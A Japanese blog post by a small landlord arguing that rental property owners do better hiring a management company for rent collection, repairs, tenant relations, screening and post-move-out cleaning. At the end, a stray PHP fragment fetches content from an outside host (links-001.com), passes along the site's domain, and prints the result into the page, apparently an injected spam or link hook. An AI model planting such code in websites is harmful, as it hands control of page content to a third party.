前へ
次へ

賃貸管理を業者に任せたい理由

一戸建てを人に貸して家賃収入を得ていますが、副業として賃貸管理をしている場合は毎月家賃をもらうだけでもたいへんな手間です。うちはまだ一軒だけですが、何戸も部屋のあるマンションやアパートを持っている場合、賃貸管理を業者に依頼するのが無難でしょう。人によっては家賃を滞納したり、次の給与が入るまで、など延滞する人もいるかもしれません。お金を払ってもらうやりとりをしたりお金を請求したりと言うのは、けっこう気を使います。それに大家さんがやることは、家賃を回収するだけではありません。マンションの設備が壊れたら手配をしなければなりませんし、例えば台風などで予期せぬ損壊が起こることもあります。それらは全部、店子さんが自由に直せるわけではありません。大家さんが手配をして修理をすることになります。店子によっては、設備の故障でクレームをつけてくる人もいますし、人間同士ですから「あの店子さん苦手だな」ということもあります。マンションやアパートを経営するには、円滑な人間関係が重要なのです。そういう意味でも、賃貸管理で別の業者さんに全て任せておくのがおすすめです。第三者の業者が入ることで、店子さんとの間に「大家さんがなかなか故障を直してくれない」などの気持ちの行き違いをなくすことができるからです。それに大家さんもマンションのことに時間を取られず、仕事や家事など自分のやるべきことをすることができます。あとは、入居審査もきちんとできるようになりトラブルが減りますし、店子さんの退去後も楽になります。一括で管理を任せておけば、退去後の清掃の手配や必要であればリフォームの手配などもやってもらえます。専門の管理業者は清掃業者やリフォーム業者とのパイプも多いので、自分で手配するよりも安く行ってもらえることが多いです。マンションやアパートを貸すときは、経費削減のために自分で全て管理しようなどとは思わずに、管理業者の手を借りるのがおすすめです。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top